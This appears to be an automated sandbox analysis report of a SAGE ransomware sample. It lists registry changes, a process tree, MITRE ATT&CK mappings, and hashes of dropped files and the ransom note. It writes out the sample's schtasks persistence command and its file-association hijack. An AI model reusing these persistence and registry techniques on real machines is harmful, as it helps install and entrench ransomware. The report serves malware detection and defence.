Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zvweqmo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zvweqmo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zvweqmo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies Control Panel 1 IoCs

evasion

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop	Rj3fNWF3.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT	Rj3fNWF3.exe
Key created	\REGISTRY\USER\S-1-5-19	Rj3fNWF3.exe
Key created	\REGISTRY\USER\S-1-5-20	Rj3fNWF3.exe

Modifies registry class 16 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\sage.notice\shell\open\command\ = "mshta.exe \"C:\\Users\\Admin\\AppData\\Roaming\\f1.hta\" \"%1\""	Rj3fNWF3.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\sage.notice\DefaultIcon	Rj3fNWF3.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\sage.notice	Rj3fNWF3.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\sage.notice\FriendlyTypeName	Rj3fNWF3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\sage.notice\FriendlyTypeName\ = "encrypted by SAGE"	Rj3fNWF3.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\sage.notice\shell\open\command	Rj3fNWF3.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\htafile\DefaultIcon	Rj3fNWF3.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\htafile	Rj3fNWF3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\.sage\ = "sage.notice"	Rj3fNWF3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\htafile\DefaultIcon\ = "%WinDir%\\SysWow64\\shell32.dll,44"	Rj3fNWF3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\sage.notice\DefaultIcon\ = "%WinDir%\\SysWow64\\shell32.dll,47"	Rj3fNWF3.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\sage.notice\shell	Rj3fNWF3.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\sage.notice\shell\open	Rj3fNWF3.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	Rj3fNWF3.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\.sage	Rj3fNWF3.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3532	schtasks.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3916	Rj3fNWF3.exe
3916	Rj3fNWF3.exe
3916	Rj3fNWF3.exe
3916	Rj3fNWF3.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: 33	2032	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2032	AUDIODG.EXE

Suspicious use of WriteProcessMemory 45 IoCs

description	pid	Process	procid_target
PID 2444 wrote to memory of 3244	2444	a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe	83
PID 2444 wrote to memory of 3244	2444	a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe	83
PID 2444 wrote to memory of 3244	2444	a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe	83
PID 3244 wrote to memory of 2404	3244	zvweqmo.exe	88
PID 3244 wrote to memory of 2404	3244	zvweqmo.exe	88
PID 3244 wrote to memory of 2404	3244	zvweqmo.exe	88
PID 2444 wrote to memory of 4352	2444	a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe	90
PID 2444 wrote to memory of 4352	2444	a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe	90
PID 2444 wrote to memory of 4352	2444	a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe	90
PID 4352 wrote to memory of 708	4352	a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe	91
PID 4352 wrote to memory of 708	4352	a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe	91
PID 4352 wrote to memory of 708	4352	a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe	91
PID 708 wrote to memory of 2900	708	zvweqmo.exe	92
PID 708 wrote to memory of 2900	708	zvweqmo.exe	92
PID 708 wrote to memory of 2900	708	zvweqmo.exe	92
PID 2444 wrote to memory of 3532	2444	a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe	93
PID 2444 wrote to memory of 3532	2444	a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe	93
PID 2444 wrote to memory of 3532	2444	a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe	93
PID 2444 wrote to memory of 3916	2444	a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe	100
PID 2444 wrote to memory of 3916	2444	a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe	100
PID 2444 wrote to memory of 3916	2444	a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe	100
PID 3916 wrote to memory of 2380	3916	Rj3fNWF3.exe	101
PID 3916 wrote to memory of 2380	3916	Rj3fNWF3.exe	101
PID 3916 wrote to memory of 2380	3916	Rj3fNWF3.exe	101
PID 2380 wrote to memory of 4972	2380	zvweqmo.exe	102
PID 2380 wrote to memory of 4972	2380	zvweqmo.exe	102
PID 2380 wrote to memory of 4972	2380	zvweqmo.exe	102
PID 2444 wrote to memory of 4848	2444	a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe	104
PID 2444 wrote to memory of 4848	2444	a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe	104
PID 2444 wrote to memory of 4848	2444	a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe	104
PID 3916 wrote to memory of 1480	3916	Rj3fNWF3.exe	106
PID 3916 wrote to memory of 1480	3916	Rj3fNWF3.exe	106
PID 3916 wrote to memory of 1480	3916	Rj3fNWF3.exe	106
PID 1480 wrote to memory of 3884	1480	Rj3fNWF3.exe	107
PID 1480 wrote to memory of 3884	1480	Rj3fNWF3.exe	107
PID 1480 wrote to memory of 3884	1480	Rj3fNWF3.exe	107
PID 3884 wrote to memory of 1296	3884	zvweqmo.exe	108
PID 3884 wrote to memory of 1296	3884	zvweqmo.exe	108
PID 3884 wrote to memory of 1296	3884	zvweqmo.exe	108
PID 3916 wrote to memory of 2300	3916	Rj3fNWF3.exe	116
PID 3916 wrote to memory of 2300	3916	Rj3fNWF3.exe	116
PID 3916 wrote to memory of 2300	3916	Rj3fNWF3.exe	116
PID 3916 wrote to memory of 4328	3916	Rj3fNWF3.exe	117
PID 3916 wrote to memory of 4328	3916	Rj3fNWF3.exe	117
PID 3916 wrote to memory of 4328	3916	Rj3fNWF3.exe	117

C:\Users\Admin\AppData\Local\Temp\a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe
"C:\Users\Admin\AppData\Local\Temp\a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2444
- C:\Users\Admin\AppData\Local\Temp\zvweqmo.exe
  C:\Users\Admin\AppData\Local\Temp\zvweqmo.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0ceb7200.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2404
- C:\Users\Admin\AppData\Local\Temp\a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe
  "C:\Users\Admin\AppData\Local\Temp\a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe" g
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4352
- - C:\Users\Admin\AppData\Local\Temp\zvweqmo.exe
    C:\Users\Admin\AppData\Local\Temp\zvweqmo.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:708
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6ae65f0c.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      PID:2900
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /CREATE /TN "N0mFUQoa" /TR "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" /SC ONLOGON /RL HIGHEST /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:3532
- C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
  "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Enumerates connected drives
  - Sets desktop wallpaper using registry
  - System Location Discovery: System Language Discovery
  - Modifies Control Panel
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3916
- - C:\Users\Admin\AppData\Local\Temp\zvweqmo.exe
    C:\Users\Admin\AppData\Local\Temp\zvweqmo.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2380
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\341f05e8.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      PID:4972
- - C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
    "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" g
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1480
  - - C:\Users\Admin\AppData\Local\Temp\zvweqmo.exe
      C:\Users\Admin\AppData\Local\Temp\zvweqmo.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3884
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\27d54fac.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1296
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2300
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4328
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f252888.vbs"
  2⤵
  - Deletes itself
  - System Location Discovery: System Language Discovery
  PID:4848

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x520 0x51c
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2032

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\PGH3GSHW\k2[1].rar

Filesize
4B

MD5
d3b07384d113edec49eaa6238ad5ff00

SHA1
f1d2d2f924e986ac86fdf7b36c94bcdf32beec15

SHA256
b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c

SHA512
0cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\0ceb7200.bat

Filesize
189B

MD5
7595b05d5e2ad10b9f714846ec2696e5

SHA1
0ed72be6d127f7b24d481775ba109a38b0d327a9

SHA256
390174fcfca45cbdf6c7738fa1121429c00ebebcda002664234fb5190203816e

SHA512
9e4fc83d4b194e2797f83e71daeb960e332789c2c399b215ebe346647cabfc2f6cf42825af5c8d262951bfc9c972269b67c81349a1906a306a1c800dbee5dff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\27d54fac.bat

Filesize
189B

MD5
14dd3e146136b217c77edb6f18a95d12

SHA1
891e459f824dbc5503b4f8a38bc60268cd5feb12

SHA256
ca32c5a231af3d64a73e91684c5917c18ac7192f04af60e00df060da9a342693

SHA512
24596622c17b7a347925cf568092b3ee445863de69899e0f9d3606bd1a87d58912482c06205d394f032b227065171906fb650ab3300056959eea88c9299864d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\2E54508B.exe

Filesize
4B

MD5
20879c987e2f9a916e578386d499f629

SHA1
c7b33ddcc42361fdb847036fc07e880b81935d5d

SHA256
9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31

SHA512
bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f

Download Submit
C:\Users\Admin\AppData\Local\Temp\341f05e8.bat

Filesize
189B

MD5
8c053d1c9e9ed7b09c455053d8ae9bca

SHA1
2000c7959506e5a02aa989748fa57c151db55ba9

SHA256
3938e3da35768ca9062a608ad28943f5572c3500b9e79bea8113babf60819d31

SHA512
3150ae504460a56deb3b306c522629a10567b9689f14ade95fefcb5abc0d8d8625c060e0a2d19cb8c5ee86dad817292e3311dc3efcc18a03040232eee8f89303

Download Submit
C:\Users\Admin\AppData\Local\Temp\6ae65f0c.bat

Filesize
189B

MD5
8d72933d582af6a13a2d4651f8efe319

SHA1
bb2be44a92368050b1ffdd38547b353c824d3815

SHA256
4c5852dff3093715cfbb4bc8688fd763d55b6138c170fe83ebf7df5fc1e601ca

SHA512
a9be4bf4a604802a17cb03c52b2814d0b337cfe6bcbf5c78d13b05430cef4211b9851310f7acfb71cf4df864c7d41abd57da75c3d057a7eb0f12e0be22d21ef4

Download Submit
C:\Users\Admin\AppData\Local\Temp\f1.vbs

Filesize
3KB

MD5
37219fd2d09abee4189a1ae33de93e2d

SHA1
5e4cc26e169b6bd16843bcc86806556dac372c57

SHA256
2a0d2418a2504ad14960dcff54f0892339eeed53e359585c9b04a29c4e6e4274

SHA512
626b89eb5b132ac43a6fb2d5dcc1c62349a6a48045a486835aa51c17348b0c4849cf5d56b4b56359c7bab5bdccaa04adf659f7486de84f9c14d86032272e5069

Download Submit
C:\Users\Admin\AppData\Local\Temp\f252888.vbs

Filesize
610B

MD5
b7fa110b58fd4baad65a54c13289bbf1

SHA1
b069553ff25022e1c8329d80649ea6b81daff492

SHA256
3f0aaea937d81a3148c47c4a40d5e26133d65bff5b5aba532064a9465f4db2c4

SHA512
91c8f3253ecb49e8f9b09f9856b9de4419bc28d1d3b7d5ed74fae5c9bca56da4ba795a3fe7f7a4b04ba4452af6f568ade473de0d5cc12528914fef28807b7122

Download Submit
C:\Users\Admin\AppData\Local\Temp\zvweqmo.exe

Filesize
15KB

MD5
f7d21de5c4e81341eccd280c11ddcc9a

SHA1
d4e9ef10d7685d491583c6fa93ae5d9105d815bd

SHA256
4485df22c627fa0bb899d79aa6ff29bc5be1dbc3caa2b7a490809338d54b7794

SHA512
e4553b86b083996038bacfb979ad0b86f578f95185d8efac34a77f6cc73e491d4f70e1449bbc9eb1d62f430800c1574101b270e1cb0eeed43a83049a79b636a3

Download Submit
C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe

Filesize
355KB

MD5
d80e625211db0a05bb8346f1fc2551f9

SHA1
2eab153918e144c22eb00d2f47e8757f21b39211

SHA256
a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f

SHA512
69261b12ffa2568f20752dab17cc48fe97598f4f640eba4d0dd54b0ab44ff6be529a97eadc1ef23d8758fd70d53c54fa9a764b9f4de86465e4004dffafd461cd

Download Submit
C:\Users\Admin\AppData\Roaming\s1qoaKDO.tmp

Filesize
72B

MD5
bba1d098293df479d4baf647bda11843

SHA1
32a32bd8c26b90893e401fbcc0f49c4f371ddb7f

SHA256
e33405526047777d6d7d74d6e23c55f17783f22802753639223f3638a212b0de

SHA512
87ae7c474e34a1af5db51840bffab67811dfe7761ab115979ca04e68271c2f14230bff8dd0803bedd2a082c05f1a41bb91e2a2c71a80595ed55f57f4df62c83d

Download Submit
C:\Users\Admin\Documents\!HELP_SOS.hta

Filesize
99KB

MD5
5d6fa5d5728fe94506bd7ce2eb6b606f

SHA1
283e80849952ced0fba921b82573f072fec0778b

SHA256
2dd89ffff975f07f8a90fa946127edf8fde2dfe0ee59c60ad1374fe35e02a355

SHA512
6dfae31445d7fb2460fcd1fd869ff03b9735b74717ae844057b342e3f5a9bc5f0f0a455845a4f6d2930e235a457628c314f03b763b547ec196db946871b46904

Download Submit
memory/708-62-0x0000000000370000-0x0000000000379000-memory.dmp

Filesize
36KB

Download
memory/708-67-0x0000000000370000-0x0000000000379000-memory.dmp

Filesize
36KB

Download
memory/1480-112-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/1480-114-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/1480-100-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/2380-84-0x0000000000570000-0x0000000000579000-memory.dmp

Filesize
36KB

Download
memory/2444-50-0x0000000002AF0000-0x0000000002AF1000-memory.dmp

Filesize
4KB

Download
memory/2444-49-0x0000000002AF0000-0x0000000002AF1000-memory.dmp

Filesize
4KB

Download
memory/2444-48-0x0000000002440000-0x0000000002640000-memory.dmp

Filesize
2.0MB

Download
memory/2444-61-0x0000000002AF0000-0x0000000002AF1000-memory.dmp

Filesize
4KB

Download
memory/2444-0-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/2444-53-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/2444-94-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/2444-51-0x0000000002440000-0x0000000002640000-memory.dmp

Filesize
2.0MB

Download
memory/2444-52-0x0000000002AF0000-0x0000000002AF1000-memory.dmp

Filesize
4KB

Download
memory/3244-46-0x0000000000CA0000-0x0000000000CA9000-memory.dmp

Filesize
36KB

Download
memory/3244-4-0x0000000000CA0000-0x0000000000CA9000-memory.dmp

Filesize
36KB

Download
memory/3884-104-0x0000000000AC0000-0x0000000000AC9000-memory.dmp

Filesize
36KB

Download
memory/3884-109-0x0000000000AC0000-0x0000000000AC9000-memory.dmp

Filesize
36KB

Download
memory/3916-97-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/3916-79-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/3916-113-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/3916-344-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/3916-362-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/4352-96-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/4352-57-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/4352-70-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download